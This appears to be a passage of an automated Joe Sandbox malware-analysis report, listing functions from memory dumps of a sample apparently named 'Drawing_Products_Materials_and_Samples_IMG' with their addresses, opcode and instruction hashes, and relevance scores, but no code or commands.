                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5e86cfd2022d02963653d99d1598aa3abe9b14b60f986deb15aa6837659e6609
                                                                                      • Instruction ID: e80090c401df3dd038d02c00af2d85e27dcb94a1153dddfbdc84148431781bdf
                                                                                      • Opcode Fuzzy Hash: 5e86cfd2022d02963653d99d1598aa3abe9b14b60f986deb15aa6837659e6609
                                                                                      • Instruction Fuzzy Hash: 49C1B274E00318CFEB54DFA5C984B9DBBB2BF89304F2081A9D809AB355DB359A81DF54
                                                                                      Function 373615F8 Relevance: .3, Instructions: 270COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 010db19c0f0f1cac528858fd44139eb3cc6e4c6a9d2f46b8be8955d331fd3169
                                                                                      • Instruction ID: 4e29c03027de993614c48eccf11b5aab7e669fd86751565057b3b620c5a16c81
                                                                                      • Opcode Fuzzy Hash: 010db19c0f0f1cac528858fd44139eb3cc6e4c6a9d2f46b8be8955d331fd3169
                                                                                      • Instruction Fuzzy Hash: AFC1AF74E00318CFEB54DFA5C984B9DBBB2BF89304F2081A9D809AB355DB359A81DF54
                                                                                      Function 37366038 Relevance: .3, Instructions: 270COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 04cc71d622619ff555a6a77790d23d3d701d913a944090862aca5601137f313c
                                                                                      • Instruction ID: f241f3ca85f9996f3bfce034e2568cd0c9665e6364f0f5774550cea072cb8625
                                                                                      • Opcode Fuzzy Hash: 04cc71d622619ff555a6a77790d23d3d701d913a944090862aca5601137f313c
                                                                                      • Instruction Fuzzy Hash: 5AC1BF74E00318CFEB54DFA5C994B9DBBB2BF89304F2081A9D809AB355DB349A81CF14
                                                                                      Function 37363008 Relevance: .3, Instructions: 270COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a0d83842c7f3b919de5007eff975cbdf69c44cca69640aa93428522c74db755c
                                                                                      • Instruction ID: bae9a0e11b035bc6df41f84da5b64f12cc8b2d1158860b933f450d0144f753ad
                                                                                      • Opcode Fuzzy Hash: a0d83842c7f3b919de5007eff975cbdf69c44cca69640aa93428522c74db755c
                                                                                      • Instruction Fuzzy Hash: 6BC1C074E00318CFEB54DFA5C984B9DBBB2BF89304F2081A9D809AB355DB359A85CF15
                                                                                      Function 37363460 Relevance: .3, Instructions: 270COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 66632c6c419e74a8c0224bf1c849b0c796381dcc7b4c027a82573b20460d8b99
                                                                                      • Instruction ID: e6bba75e7dee2fd092957d04344214c8ea6e2340173ff7495671951ac707fa3e
                                                                                      • Opcode Fuzzy Hash: 66632c6c419e74a8c0224bf1c849b0c796381dcc7b4c027a82573b20460d8b99
                                                                                      • Instruction Fuzzy Hash: 35C1B074E00318CFEB54DFA5C984B9DBBB2BF89304F2081A9D809AB355DB349A85CF11
                                                                                      Function 37360040 Relevance: .3, Instructions: 270COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a2757dc207d8e1aba3a09ee776b6cc8f033c7f3096c7065c82a282f272d65388
                                                                                      • Instruction ID: 710750f18e66ea988002381a71c34a97d91374d0cbd18488c67b40aafa0b4d57
                                                                                      • Opcode Fuzzy Hash: a2757dc207d8e1aba3a09ee776b6cc8f033c7f3096c7065c82a282f272d65388
                                                                                      • Instruction Fuzzy Hash: 35C1AF74E00318CFEB54DFA5C984B9DBBB2BF89304F2081A9D809AB355DB359A81DF14
                                                                                      Function 37366490 Relevance: .3, Instructions: 270COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 214286dc0537c624e6eefcecd409eb8de3a67649b21206f1997be632a0e5f243
                                                                                      • Instruction ID: f61ed8055eb61045c2df7ebeb0c0809dcd9e0387ff73aa0c76b3cce64cf52823
                                                                                      • Opcode Fuzzy Hash: 214286dc0537c624e6eefcecd409eb8de3a67649b21206f1997be632a0e5f243
                                                                                      • Instruction Fuzzy Hash: B6C1A074E00318CFEB54DFA5C984B9DBBB2BF89304F2081A9D809BB255DB355A85DF14
                                                                                      Function 37360498 Relevance: .3, Instructions: 270COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 518018d8752ddc91ab16d5ee3441508f59e0fff6122a934df4277cf1d86d193e
                                                                                      • Instruction ID: 5bdfec65a26811adca3a0b60126261aa18c582e4408dfd0b97abf670248e5a3e
                                                                                      • Opcode Fuzzy Hash: 518018d8752ddc91ab16d5ee3441508f59e0fff6122a934df4277cf1d86d193e
                                                                                      • Instruction Fuzzy Hash: 4BC1AF74E00318CFEB54DFA5C984B9DBBB2BF89304F2081A9D809AB255DB359A81DF54
                                                                                      Function 373608F0 Relevance: .3, Instructions: 270COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6d8cdad84be8348b0da2ad09cbbe8bb1ca0d87666ed482d6b7667d3c1278582b
                                                                                      • Instruction ID: 3c2a67944107db7ff7730e656625f36e3c22ae4aa33325775fab41c03c63ec2b
                                                                                      • Opcode Fuzzy Hash: 6d8cdad84be8348b0da2ad09cbbe8bb1ca0d87666ed482d6b7667d3c1278582b
                                                                                      • Instruction Fuzzy Hash: 4FC1AE74E00318CFEB54DFA5C994BDDBBB2BF89304F2081A9D809AB255DB359A81CF14
                                                                                      Function 37411940 Relevance: .2, Instructions: 202COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151214905.0000000037410000.00000040.00000800.00020000.00000000.sdmp, Offset: 37410000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37410000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b3cf9a4d40218fb8dd340a1dbed226a294ac8d93f0c9ad36e45b261ae590f198
                                                                                      • Instruction ID: 3f6b26b268ce6d49865aa1d3e667c2ec10835a52f972ed9c84b82afcae3e875e
                                                                                      • Opcode Fuzzy Hash: b3cf9a4d40218fb8dd340a1dbed226a294ac8d93f0c9ad36e45b261ae590f198
                                                                                      • Instruction Fuzzy Hash: 8A91A374E04218CFEB54DFA9C990ADDBBB2BF89300F648129D805BB354DB356946CF54
                                                                                      Function 37414B40 Relevance: .2, Instructions: 202COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151214905.0000000037410000.00000040.00000800.00020000.00000000.sdmp, Offset: 37410000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37410000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9d8c5618c27a9dffce58dcf60a9ad55fdc8d3032def25b45831bd80f2db9e267
                                                                                      • Instruction ID: 719ff9915ff1f4ea81dffc537bac3105e175f8905a815286a9c2622dc74d3ad7
                                                                                      • Opcode Fuzzy Hash: 9d8c5618c27a9dffce58dcf60a9ad55fdc8d3032def25b45831bd80f2db9e267
                                                                                      • Instruction Fuzzy Hash: 9491B174E00218CFEB58DFA9D990ADDBBB2BF89310F608129D805BB358DB356946CF54
                                                                                      Function 37416760 Relevance: .2, Instructions: 202COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151214905.0000000037410000.00000040.00000800.00020000.00000000.sdmp, Offset: 37410000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37410000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0faed66f8f3d6f1b83f94181b31ab7ba14b8c754c463830d99250f1cf496d75a
                                                                                      • Instruction ID: 8d19b43d84f23cdc31cd5d2f11b17c9db3ca02dc5c1ac3c4f28afe84f42e3e2c
                                                                                      • Opcode Fuzzy Hash: 0faed66f8f3d6f1b83f94181b31ab7ba14b8c754c463830d99250f1cf496d75a
                                                                                      • Instruction Fuzzy Hash: E391A074E00218CFEB54DFA9C990BDDBBB2BB89300F648129D805BB358DB35A946CF55
                                                                                      Function 37413560 Relevance: .2, Instructions: 202COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151214905.0000000037410000.00000040.00000800.00020000.00000000.sdmp, Offset: 37410000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37410000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f259a7b0a52ffbb371f46172c3925a35c9003df2ecf0d5343ea5adad5860b527
                                                                                      • Instruction ID: 876717d38b4d5a7f8162d130e1d06b9210843316b5e5a6b2894272b5deb40433
                                                                                      • Opcode Fuzzy Hash: f259a7b0a52ffbb371f46172c3925a35c9003df2ecf0d5343ea5adad5860b527
                                                                                      • Instruction Fuzzy Hash: D7919074E00218CFEB54DFA9C990ADDBBB2BF89310F648129D805BB354EB35A946CF54
                                                                                      Function 37410360 Relevance: .2, Instructions: 202COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151214905.0000000037410000.00000040.00000800.00020000.00000000.sdmp, Offset: 37410000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37410000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ac824e18f5da6cad761ec79c46f6c6e91d6709c827b20b941db48360a71f4b9f
                                                                                      • Instruction ID: 105b2cca7b1cac73f019c62ff08bd76de2809f2bd63f52ca888491dc691c0417
                                                                                      • Opcode Fuzzy Hash: ac824e18f5da6cad761ec79c46f6c6e91d6709c827b20b941db48360a71f4b9f
                                                                                      • Instruction Fuzzy Hash: 7791B274E00218CFEB54DFA9C990ADDBBB2BF89310F648129D805BB358DB35A946CF54
                                                                                      Function 37411300 Relevance: .2, Instructions: 202COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151214905.0000000037410000.00000040.00000800.00020000.00000000.sdmp, Offset: 37410000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37410000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b923985bcd3877ae8a83c8528102fe81a10f604575daf5cfd2767ae52e7ec213
                                                                                      • Instruction ID: c5a85af7c037ae0ba4c2ef5aa5462f3fc2933dd3a2e7c6f7505bed51bc70fffd
                                                                                      • Opcode Fuzzy Hash: b923985bcd3877ae8a83c8528102fe81a10f604575daf5cfd2767ae52e7ec213
                                                                                      • Instruction Fuzzy Hash: 8391A274E04218CFEB54DFA9C990ADDBBB2BF89300F608129D805BB358DB35A946CF54
                                                                                      Function 37414500 Relevance: .2, Instructions: 202COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151214905.0000000037410000.00000040.00000800.00020000.00000000.sdmp, Offset: 37410000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37410000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 82c78bd462d84bd74ceea3478529bfd2bb392a78cbaf27cd80b554d63f1a35ed
                                                                                      • Instruction ID: 0c213eb63496402c8b54f5030a862b2425e240e6143d1802c7183ba14d87ff86
                                                                                      • Opcode Fuzzy Hash: 82c78bd462d84bd74ceea3478529bfd2bb392a78cbaf27cd80b554d63f1a35ed
                                                                                      • Instruction Fuzzy Hash: 5291B174E00218CFEB58DFA9D890ADDBBB2BF89300F648129D805BB358DB356946CF54
                                                                                      Function 37412F20 Relevance: .2, Instructions: 202COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151214905.0000000037410000.00000040.00000800.00020000.00000000.sdmp, Offset: 37410000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37410000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6c9547632a9b60a7476cf8ee9a10b74f63a54ede1d2a41b1ed36dc173445739c
                                                                                      • Instruction ID: e0ac47c354574d8b736aa98d1f716f38783e9d81f1b2ded7b65d0876a3bafad0
                                                                                      • Opcode Fuzzy Hash: 6c9547632a9b60a7476cf8ee9a10b74f63a54ede1d2a41b1ed36dc173445739c
                                                                                      • Instruction Fuzzy Hash: 5991A374E00218CFEB54DFA9C990ADDBBB2BF89300F648129D805BB358EB356946DF54
                                                                                      Function 37416120 Relevance: .2, Instructions: 202COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151214905.0000000037410000.00000040.00000800.00020000.00000000.sdmp, Offset: 37410000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37410000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 94b4486693e873e85cef4d7f13a428e72f5e5e998ebdfb319c32bb217b23bd9e
                                                                                      • Instruction ID: c627ae4b8d486a90e8c2699c75f3eb7965aa8d7b050bb1061695e9306cfdf4da
                                                                                      • Opcode Fuzzy Hash: 94b4486693e873e85cef4d7f13a428e72f5e5e998ebdfb319c32bb217b23bd9e
                                                                                      • Instruction Fuzzy Hash: CF919074E042188FEB54DFA9C990BDDBBB2BF89300F608129D805BB358DB35A946CF55
                                                                                      Function 3736A968 Relevance: .2, Instructions: 165COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e5a850653a0c1984988a55a2b28f45443704fe88a3a65fcea3522312f983ea58
                                                                                      • Instruction ID: 3600b07a2e08fffc91497e2ff2413282e8d5bf10788f27fb8fd5d5741e17d2ef
                                                                                      • Opcode Fuzzy Hash: e5a850653a0c1984988a55a2b28f45443704fe88a3a65fcea3522312f983ea58
                                                                                      • Instruction Fuzzy Hash: 2F61A3B5E012188FEB04DFAAC5887DDFBF2BF88355F14C169D408A7255E7389A85CB90
                                                                                      Function 373638A8 Relevance: .2, Instructions: 155COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 44243ecc0b76536a7dec107f4338d0316391d9b5e2d728e9ce8724b72489a0f8
                                                                                      • Instruction ID: 0900536ae3571a2d6265e5ab0ab8e895167335da3aaa81f39b0f98aba898e199
                                                                                      • Opcode Fuzzy Hash: 44243ecc0b76536a7dec107f4338d0316391d9b5e2d728e9ce8724b72489a0f8
                                                                                      • Instruction Fuzzy Hash: ED71B074E052289FEB64DF29D995BDDBBF2AF89300F1081E9D50CA7294DB305E819F41
                                                                                      Function 36A9003B Relevance: .1, Instructions: 146COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a05b21f0f28e85b9d47c8dca66e79de539f4ca32af103cc4f4371bce3c34b9bf
                                                                                      • Instruction ID: 98b97b241d96904d3fa4543696f5b6e08f7f731a9d3d9fce26f4b5ba8bd0b8f7
                                                                                      • Opcode Fuzzy Hash: a05b21f0f28e85b9d47c8dca66e79de539f4ca32af103cc4f4371bce3c34b9bf
                                                                                      • Instruction Fuzzy Hash: F9619774E01219CFEB68DF66D940B9DBBB2BF88300F14C1A9D409B7655DB315A82EF50
                                                                                      Function 36A9CCF7 Relevance: .1, Instructions: 122COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 54b9477378a0c2824763ffe27926fd222a42fef0417d7128b2b601037cef2814
                                                                                      • Instruction ID: 0ad52e15df040d005d05d01e708868d5a8399199259df851c9e3d9a8176075fc
                                                                                      • Opcode Fuzzy Hash: 54b9477378a0c2824763ffe27926fd222a42fef0417d7128b2b601037cef2814
                                                                                      • Instruction Fuzzy Hash: 07410271E0160C8BEB14DFAAD9446DEBBF2AF8A300F20912AC819BB255DB345946CF54
                                                                                      Function 36A98797 Relevance: .1, Instructions: 113COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2ae7b9b09cbfaec95f72802b7ded28841e7372985b998be4116c174bee53e3d0
                                                                                      • Instruction ID: 0b30ec357271c1b1cefc244e1cb6c349af748cc8db6a04d7505fe913059f1214
                                                                                      • Opcode Fuzzy Hash: 2ae7b9b09cbfaec95f72802b7ded28841e7372985b998be4116c174bee53e3d0
                                                                                      • Instruction Fuzzy Hash: 1241E2B1D012189BEB18CFAAD8883CEBBF2BF89314F24C52AD408AB294DB744545CF51
                                                                                      Function 37364EC7 Relevance: .1, Instructions: 107COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7e5ed221d3409322a263158370f9bc091c066cc15ea7fe70ec6599c12502eb4c
                                                                                      • Instruction ID: ed822be30e66e8acf5d65c81aa28b2bde0af715d3be34bc0e910ebb1f9549244
                                                                                      • Opcode Fuzzy Hash: 7e5ed221d3409322a263158370f9bc091c066cc15ea7fe70ec6599c12502eb4c
                                                                                      • Instruction Fuzzy Hash: 9E41F674D016488BEB14DFAAD9446DEFBF2BF89304F20D12AC418BB259DB345A46CF50
                                                                                      Function 36A9C8A1 Relevance: .1, Instructions: 106COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4dfc76df30ca802d6c2e0742fc6120890a7ce23d7bada7a19fc0702cf3f14972
                                                                                      • Instruction ID: 9cda64848e9e2f1aef9adee8b6c4e2042c88f16a5b24269823f245cdb7af25cb
                                                                                      • Opcode Fuzzy Hash: 4dfc76df30ca802d6c2e0742fc6120890a7ce23d7bada7a19fc0702cf3f14972
                                                                                      • Instruction Fuzzy Hash: 5C41D571D0160C8BEB18DFAAC9546DEBBF2AF8A304F20D12AC819BB255DB345946CF44
                                                                                      Function 3736B6A0 Relevance: .1, Instructions: 106COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 65b494df8986e249beb6be4bb6e59b7cacb4490e2e2d5109368ef4282d650e3f
                                                                                      • Instruction ID: 272c478a4a6d5a6aa4ea5cb117bb3d0c58c3cb29c8d4bde99fd572adbe4016d7
                                                                                      • Opcode Fuzzy Hash: 65b494df8986e249beb6be4bb6e59b7cacb4490e2e2d5109368ef4282d650e3f
                                                                                      • Instruction Fuzzy Hash: C441FB70D052188BEB18CFAAD9546DEBBF2AF89304F20D029C418BB259DB354946DF54
                                                                                      Function 3736A959 Relevance: .1, Instructions: 106COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e34fb0b6b99665aa881c74f78a9797054f1cb955936a60ba8280164319b2f8be
                                                                                      • Instruction ID: f318879d5ddf4f6dad51fb9d0c1c7a06e1d33a44f6ff340171d3287603ca7e87
                                                                                      • Opcode Fuzzy Hash: e34fb0b6b99665aa881c74f78a9797054f1cb955936a60ba8280164319b2f8be
                                                                                      • Instruction Fuzzy Hash: 3B41B6B5E056089FEB08CFAAD9847DEFBF2AF88314F14C16AD418A7259E7344946CF50
                                                                                      Function 36A9DE58 Relevance: .1, Instructions: 105COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 63b68b0f80d94d0e0856e0b9c70d6afcda3330d1916fae820c5bce7233c1c5a9
                                                                                      • Instruction ID: 5eed90cf5e15843b69d23b740353e9235a20d40f6042ab5c15f3b9a40e1cb12f
                                                                                      • Opcode Fuzzy Hash: 63b68b0f80d94d0e0856e0b9c70d6afcda3330d1916fae820c5bce7233c1c5a9
                                                                                      • Instruction Fuzzy Hash: 1041E3B4D0160C8BEB18DFAAD9446DDBBF2BF89300F20C12AC818BB255DB344946CF54
                                                                                      Function 37362FF8 Relevance: .1, Instructions: 105COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4eb3839ff865e9fd75891c95f29b20e34c3f13e41f64fce60c79d93ff3a54123
                                                                                      • Instruction ID: 0e4682b2b7ebbe0629baa6f1e3058b44a1e41a2a8902d7108f79e2ce85f414d5
                                                                                      • Opcode Fuzzy Hash: 4eb3839ff865e9fd75891c95f29b20e34c3f13e41f64fce60c79d93ff3a54123
                                                                                      • Instruction Fuzzy Hash: B941F5B0E01248CBEB14DFAAC9546DEFBF2AF89304F20D12AC418BB259DB345946CF55
                                                                                      Function 36A9F867 Relevance: .1, Instructions: 104COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d116417c40c002b3cdc81d6dd879ef1c670efbdd4b02a6ba2cd629467fead9f5
                                                                                      • Instruction ID: 040fe05f039a4ae3c9f758fc4ddc6c08359eb774d8a959b215fabb2c36460eee
